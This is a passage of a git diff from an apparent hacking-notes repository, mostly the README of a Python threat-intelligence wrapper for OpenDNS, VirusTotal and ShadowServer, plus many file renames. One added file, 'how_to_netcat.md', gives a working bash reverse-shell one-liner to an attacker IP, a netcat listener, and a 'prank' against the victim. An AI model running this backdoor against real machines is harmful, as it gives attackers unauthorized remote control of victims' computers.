.. + +} +``` + +#### DNS RR history for a Domain + +Calls `dnsdb/name/a/` Investigate API endpoint. +Use this method to find out related domains to domains given in a list, or any other Python enumerable. + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +investigate.dns_rr(domains) +``` + +will result in: + +``` +{ + 'features': { + 'geo_distance_mean': 0.0, + 'locations': [ + { + 'lat': 59.89440155029297, + 'lon': 30.26420021057129 + } + ], + 'rips': 1, + 'is_subdomain': False, + 'ttls_mean': 86400.0, + 'non_routable': False, + } + + .. + +} +``` + +#### DNS RR history for an IP + +Calls `dnsdb/ip/a/` Investigate API endpoint. +Use this method to find out related domains to the IP addresses given in a list, or any other Python enumerable. + +```python +ips = ['8.8.8.8'] +investigate.rr_history(ips) +``` + +will result in: + +``` +{ + "8.8.8.8": { + "rrs": [ + { + "name": "8.8.8.8", + "type": "A", + "class": "IN", + "rr": "000189.com.", + "ttl": 3600 + }, + { + "name": "8.8.8.8", + "type": "A", + "class": "IN", + "rr": "008.no-ip.net.", + "ttl": 60 + }, + } + + .. + +} +``` + +#### WHOIS information for a domain + +##### WHOIS information for an email + +Calls `whois/emails/{email}` Investigate API endpoint. + +Use this method to see WHOIS information for the email address. (For now, the OpenDNS API will only return at most 500 results) + +```python +emails = ["dns-admin@google.com"] +investigate.whois_emails(emails) +``` + +will result in: + +``` +{ + "dns-admin@google.com": { + "totalResults": 500, + "moreDataAvailable": true, + "limit": 500, + "domains": [ + { + "domain": "0emm.com", + "current": true + }, + .. + ] + } +} +``` + +##### WHOIS information for a nameserver + +Calls `whois/nameservers/{nameserver}` Investigate API endpoint. + +Use this method to see WHOIS information for the nameserver. (For now, the OpenDNS API will only return at most 500 results) + +```python +nameservers = ["ns2.google.com"] +investigate.whois_nameservers(nameservers) +``` + +will result in: + +``` +{ + "ns2.google.com": { + "totalResults": 500, + "moreDataAvailable": true, + "limit": 500, + "domains": [ + { + "domain": "46645.biz", + "current": true + }, + .. + ] + } +} +``` + +##### WHOIS information for a domain + +Calls `whois/{domain}` Investigate API endpoint. + +Use this method to see WHOIS information for the domain. + +```python +domains = ["google.com"] +investigate.whois_domains(domains) +``` + +will result in: + +``` +{ + "administrativeContactFax": null, + "whoisServers": null, + "addresses": [ + "1600 amphitheatre parkway", + "please contact contact-admin@google.com, 1600 amphitheatre parkway", + "2400 e. bayshore pkwy" + ], + .. +} +``` + +##### Historical WHOIS information for a domain + +Calls `whois/{domain}/history` Investigate API endpoint. + +Use this method to see historical WHOIS information for the domain. + +```python +domains = ["5esb.biz"] +investigate.whois_domains_history(domains) +``` + +will result in: + +``` +{ + '5esb.biz':[ + { + u'registrantFaxExt':u'', + u'administrativeContactPostalCode':u'656448', + u'zoneContactCity':u'', + u'addresses':[ + u'nan qu hua yuan xiao he' + ], + .. + }, + .. + ] +} +``` + +#### Latest malicious domains for an IP + +Calls `ips/{ip}/latest_domains` Investigate API endpoint. + +Use this method to see whether the IP address has any malicious domains associated with it. + +```python +ips = ["8.8.8.8"] +investigate.latest_malicious(ips) +``` + +will result in: + +``` +{ + [ + '7ltd.biz', + 'co0s.ru', + 't0link.in', + ] + + .. +} +``` + +---- + +### VirusTotal API + +[VirusTotal](https://www.virustotal.com/) provides an +[API](https://www.virustotal.com/en/documentation/public-api/) that makes it +possible to query for the reports about: + + * Domains + * URLs + * IPs + * File hashes + * File Upload + * Live Feed + * Advanced search + +To use the VirusTotal API wrapper import `VirusTotalApi` class from `threat_intel.virustotal` module: + +```python +from threat_intel.virustotal import VirusTotalApi +``` + +To initialize the API wrapper, you need the API key: + +```python +vt = VirusTotalApi("") +``` + +VirusTotal API calls allow squeezing a list of file hashes or URLs into a single HTTP call. +Depending on the API version you are using (public or private) you may need to tune the maximum number +of the resources (file hashes or URLs) that could be passed in a single API call. +You can do it with the `resources_per_req` parameter: + +```python +vt = VirusTotalApi("", resources_per_req=4) +``` + +When using the public API your standard request rate allows you too put maximum 4 resources per request. +With private API you are able to put up to 25 resources per call. That is also the default value if you +don't pass the `resources_per_req` parameter. + +Of course, when calling the API wrapper methods in the `VirusTotalApi` class, you can pass as many resources +as you want and the wrapper will take care of producing as many API calls as necessary to satisfy the request rate. + +Similarly to OpenDNS API wrapper, you can also specify the file name where the responses will be cached: + +```python +vt = VirusTotalApi("", cache_file_name="/tmp/cache.virustotal.json") +``` + +#### Domain report endpoint + +Calls `domain/report` VirusTotal API endpoint. +Pass a list or any other Python enumerable containing the domains: + +```python +domains = ["google.com", "baidu.com", "bibikun.ru"] +vt.get_domain_reports(domains) +``` + +will result in: + +``` +{ + "baidu.com": { + "undetected_referrer_samples": [ + { + "positives": 0, + "total": 56, + "sha256": "e3c1aea1352362e4b5c008e16b03810192d12a4f1cc71245f5a75e796c719c69" + } + ], + + .. + + } +} +``` + + +#### URL report endpoint + +Calls `url/report` VirusTotal API endpoint. +Pass a list or any other Python enumerable containing the URL addresses: + +```python +urls = ["http://www.google.com", "http://www.yelp.com"] +vt.get_url_reports(urls) +``` + +will result in: + +``` +{ + "http://www.google.com": { + "permalink": "https://www.virustotal.com/url/dd014af5ed6b38d9130e3f466f850e46d21b951199d53a18ef29ee9341614eaf/analysis/1423344006/", + "resource": "http://www.google.com", + "url": "http://www.google.com/", + "response_code": 1, + "scan_date": "2015-02-07 21:20:06", + "scan_id": "dd014af5ed6b38d9130e3f466f850e46d21b951199d53a18ef29ee9341614eaf-1423344006", + "verbose_msg": "Scan finished, scan information embedded in this object", + "filescan_id": null, + "positives": 0, + "total": 62, + "scans": { + "CLEAN MX": { + "detected": false, + "result": "clean site" + }, + } + .. + +} +``` + +#### URL scan endpoint + +Calls 'url/scan' VirusTotal API endpoint. +Submit a url or any other Python enumerable containing the URL addresses: + +```python +urls = ["http://www.google.com", "http://www.yelp.com"] +vt.post_url_report(urls) +``` + +#### Hash report endpoint + +Calls `file/report` VirusTotal API endpoint. +You can request the file reports passing a list of hashes (md5, sha1 or sha2): + +```python +file_hashes = [ + "99017f6eebbac24f351415dd410d522d", + "88817f6eebbac24f351415dd410d522d" +] + +vt.get_file_reports(file_hashes) +``` + +will result in: + +``` +{ + "88817f6eebbac24f351415dd410d522d": { + "response_code": 0, + "resource": "88817f6eebbac24f351415dd410d522d", + "verbose_msg": "The requested resource is not among the finished, queued or pending scans" + }, + "99017f6eebbac24f351415dd410d522d": { + "scan_id": "52d3df0ed60c46f336c131bf2ca454f73bafdc4b04dfa2aea80746f5ba9e6d1c-1423261860", + "sha1": "4d1740485713a2ab3a4f5822a01f645fe8387f92", + } + + .. + +} +``` + +#### Hash rescan endpoint + +Calls `file/rescan` VirusTotal API endpoint. Use to rescan a previously submitted file. +You can request the file reports passing a list of hashes (md5, sha1 or sha2): + +#### Hash behavior endpoint + +Calls `file/behaviour` VirusTotal API endpoint. Use to get a report about the behavior of the file when executed in a sandboxed environment (Cuckoo sandbox). +You can request the file reports passing a list of hashes (md5, sha1 or sha2): + +```python +file_hashes = [ + "99017f6eebbac24f351415dd410d522d", + "88817f6eebbac24f351415dd410d522d" +] + +vt.get_file_behaviour(file_hashes) +``` + +#### Hash network-traffic endpoint + +Calls `file/network-traffic` VirusTotal API endpoint. Use to get the dump of the network traffic generated by the file when executed. +You can request the file reports passing a list of hashes (md5, sha1 or sha2): + +```python +file_hashes = [ + "99017f6eebbac24f351415dd410d522d", + "88817f6eebbac24f351415dd410d522d" +] + +vt.get_file_network_traffic(file_hashes) +``` + +#### Hash download endpoint + +Calls `file/download` VirusTotal API endpoint. Use to download a file by its hash. +You can request the file reports passing a list of hashes (md5, sha1 or sha2): + +```python +file_hashes = [ + "99017f6eebbac24f351415dd410d522d", + "88817f6eebbac24f351415dd410d522d" +] + +vt.get_file_download(file_hashes) +``` + +#### IP reports endpoint + +Calls `ip-address/report` VirusTotal API endpoint. +Pass a list or any other Python enumerable containing the IP addresses: + +```python +ips = ['90.156.201.27', '198.51.132.80'] +vt.get_ip_reports(ips) +``` + +will result in: + +``` +{ + "90.156.201.27": { + "asn": "25532", + "country": "RU", + "response_code": 1, + "as_owner": ".masterhost autonomous system", + "verbose_msg": "IP address found in dataset", + "resolutions": [ + { + "last_resolved": "2013-04-01 00:00:00", + "hostname": "027.ru" + }, + { + "last_resolved": "2015-01-20 00:00:00", + "hostname": "600volt.ru" + }, + + .. + + ], + "detected_urls": [ + { + "url": "http://shop.albione.ru/", + "positives": 2, + "total": 52, + "scan_date": "2014-04-06 11:18:17" + }, + { + "url": "http://www.orlov.ru/", + "positives": 3, + "total": 52, + "scan_date": "2014-03-05 09:13:31" + } + ], + }, + + "198.51.132.80": { + + .. + + } +} +``` + +#### URL live feed endpoint + +Calls `url/distribution` VirusTotal API endpoint. Use to get a live feed with the latest URLs submitted to VirusTotal. + +```python +vt.get_url_distribution() +``` + +#### Hash live feed endpoint + +Calls `file/distribution` VirusTotal API endpoint. Use to get a live feed with the latest Hashes submitted to VirusTotal. + +```python +vt.get_file_distribution() +``` + +#### Hash search endpoint + +Calls `file/search` VirusTotal API endpoint. Use to search for samples that match some binary/metadata/detection criteria. + +```python +vt.get_file_search() +``` + +#### File date endpoint + +Calls `file/clusters` VirusTotal API endpoint. Use to list similarity clusters for a given time frame. + +```python +vt.get_file_clusters() +``` + +--- + +### ShadowServer API + +[ShadowServer](http://shadowserver.org/) provides an [API](http://bin-test.shadowserver.org/) that allows to test +the hashes against a list of known software applications. + +To use the ShadowServer API wrapper import `ShadowServerApi` class from `threat_intel.shadowserver` module: + +```python +from threat_intel.shadowserver import ShadowServerApi +``` + +To use the API wrapper simply call the `ShadowServerApi` initializer: + +```python +ss = ShadowServerApi() +``` + +You can also specify the file name where the API responses will be cached: + +```python +ss = ShadowServerApi(cache_file_name="/tmp/cache.shadowserver.json") +``` + +To check whether the hashes are on the ShadowServer list of known hashes, +call `get_bin_test` method and pass enumerable with the hashes you want to test: + +```python +file_hashes = [ + "99017f6eebbac24f351415dd410d522d", + "88817f6eebbac24f351415dd410d522d" +] + +ss.get_bin_test(file_hashes) + +``` + +--- + +## Installation + +### Install with `pip` + +```shell +$ pip install threat_intel +``` + +### Testing +Go to town with `make`: + +```shell +$ sudo pip install tox +$ make test +``` diff --git a/Botnets/.DS_Store b/Network_and_802.11/Ddos_Attacks/Botnets/.DS_Store similarity index 100% rename from Botnets/.DS_Store rename to Network_and_802.11/Ddos_Attacks/Botnets/.DS_Store diff --git a/Botnets/README.md b/Network_and_802.11/Ddos_Attacks/Botnets/README.md similarity index 100% rename from Botnets/README.md rename to Network_and_802.11/Ddos_Attacks/Botnets/README.md diff --git a/Botnets/malicious.txt b/Network_and_802.11/Ddos_Attacks/Botnets/malicious.txt similarity index 100% rename from Botnets/malicious.txt rename to Network_and_802.11/Ddos_Attacks/Botnets/malicious.txt diff --git a/Ddos/README.md b/Network_and_802.11/Ddos_Attacks/README.md similarity index 100% rename from Ddos/README.md rename to Network_and_802.11/Ddos_Attacks/README.md diff --git a/Network_and_802.11/how_to_netcat.md b/Network_and_802.11/how_to_netcat.md new file mode 100644 index 0000000..24fc29a --- /dev/null +++ b/Network_and_802.11/how_to_netcat.md @@ -0,0 +1,24 @@ +# How to netcat (or a little backdoor) + +Create the reverse shell in the port 1337: + +```bash +$ sh -i >& /dev/tcp/ATTACKERS_IP/1337 0>&1 +``` + +Now just netcat to it. From a Linux machine: + +```bash +$ nc -l -p 1337 +``` + +Or from a Macbook: +```bash +$ nc -l 1337 +``` + +You should get shell. A cute prank is making the victim's computer talk: + +```bash +$ say Hacked +``` diff --git a/Network_and_802.11/wireshark_stuff/README.md b/Network_and_802.11/wireshark_stuff/README.md index 260c4c7..05fb4f7 100644 --- a/Network_and_802.11/wireshark_stuff/README.md +++ b/Network_and_802.11/wireshark_stuff/README.md @@ -1,4 +1,4 @@ -# [Wireshark Guide (by bt3)](http://bt3gl.github.io/wiresharking-for-fun-or-profit.html) +# Wireshark Guide [Wireshark](https://www.wireshark.org/) is an open source **network packet analyzer** that allows live traffic analysis, with support to several protocols. diff --git a/Dockerfiles_for_Hacking/Dockerfile_kali b/Other_Hackings/Dockerfiles_for_Hacking/Dockerfile_kali similarity index 100% rename from Dockerfiles_for_Hacking/Dockerfile_kali rename to Other_Hackings/Dockerfiles_for_Hacking/Dockerfile_kali diff --git a/Dockerfiles_for_Hacking/README.md b/Other_Hackings/Dockerfiles_for_Hacking/README.md similarity index 100% rename from Dockerfiles_for_Hacking/README.md rename to Other_Hackings/Dockerfiles_for_Hacking/README.md diff --git a/Guides_from_other_hackers/cRYvK4jb.txt b/Other_Hackings/Guides_from_other_hackers/cRYvK4jb.txt similarity index 100% rename from Guides_from_other_hackers/cRYvK4jb.txt rename to Other_Hackings/Guides_from_other_hackers/cRYvK4jb.txt diff --git a/Rubber_Duck/HAK/Encoder/.classpath b/Other_Hackings/Rubber_Duck/HAK/Encoder/.classpath similarity index 100% rename from Rubber_Duck/HAK/Encoder/.classpath rename to Other_Hackings/Rubber_Duck/HAK/Encoder/.classpath diff --git a/Rubber_Duck/HAK/Encoder/.project b/Other_Hackings/Rubber_Duck/HAK/Encoder/.project similarity index 100% rename from Rubber_Duck/HAK/Encoder/.project rename to Other_Hackings/Rubber_Duck/HAK/Encoder/.project diff --git a/Rubber_Duck/HAK/Encoder/.settings/org.eclipse.jdt.core.prefs b/Other_Hackings/Rubber_Duck/HAK/Encoder/.settings/org.eclipse.jdt.core.prefs similarity index 100% rename from Rubber_Duck/HAK/Encoder/.settings/org.eclipse.jdt.core.prefs rename to Other_Hackings/Rubber_Duck/HAK/Encoder/.settings/org.eclipse.jdt.core.prefs diff --git a/Rubber_Duck/HAK/Encoder/src/Encoder.java b/Other_Hackings/Rubber_Duck/HAK/Encoder/src/Encoder.java similarity index 100% rename from Rubber_Duck/HAK/Encoder/src/Encoder.java rename to Other_Hackings/Rubber_Duck/HAK/Encoder/src/Encoder.java diff --git a/Rubber_Duck/HAK/Firmware/Images/duck.hex b/Other_Hackings/Rubber_Duck/HAK/Firmware/Images/duck.hex similarity index 100% rename from Rubber_Duck/HAK/Firmware/Images/duck.hex rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Images/duck.hex diff --git a/Rubber_Duck/HAK/Firmware/Images/m_duck.hex b/Other_Hackings/Rubber_Duck/HAK/Firmware/Images/m_duck.hex similarity index 100% rename from Rubber_Duck/HAK/Firmware/Images/m_duck.hex rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Images/m_duck.hex diff --git a/Rubber_Duck/HAK/Firmware/Images/osx.hex b/Other_Hackings/Rubber_Duck/HAK/Firmware/Images/osx.hex similarity index 100% rename from Rubber_Duck/HAK/Firmware/Images/osx.hex rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Images/osx.hex diff --git a/Rubber_Duck/HAK/Firmware/Images/usb.hex b/Other_Hackings/Rubber_Duck/HAK/Firmware/Images/usb.hex similarity index 100% rename from Rubber_Duck/HAK/Firmware/Images/usb.hex rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Images/usb.hex diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/Framework.config b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/Framework.config similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/Framework.config rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/Framework.config diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsln b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsln similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsln rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsln diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsuo b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsuo similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsuo rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.atsuo diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrgccproj b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrgccproj similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrgccproj rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrgccproj diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsln b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsln similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsln rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsln diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsuo b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsuo similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsuo rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.avrsuo diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.cproj b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.cproj similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.cproj rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/duck.cproj diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/license.txt b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/license.txt similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/license.txt rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/license.txt diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/evk1101.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/evk1101.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/evk1101.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/evk1101.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/init.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/init.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/init.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/init.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/boards/evk1101/led.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/components/memory/sd_mmc/sd_mmc_spi/sd_mmc_spi_mem.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/flashc/flashc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/gpio/gpio.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/exception.S b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/exception.S similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/exception.S rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/exception.S diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/intc/intc.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm_conf_clocks.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm_conf_clocks.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm_conf_clocks.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/pm_conf_clocks.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/power_clocks_lib.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/sleep.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/sleep.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/sleep.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/pm/sleep.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.c b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.c similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.c rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.c diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.h b/Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.h similarity index 100% rename from Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.h rename to Other_Hackings/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/spi/spi.h diff --git a/Rubber_Duck/HAK/Firmware/Source/Duck_HID/src/asf/avr32/drivers/usbb/usbb_device.c 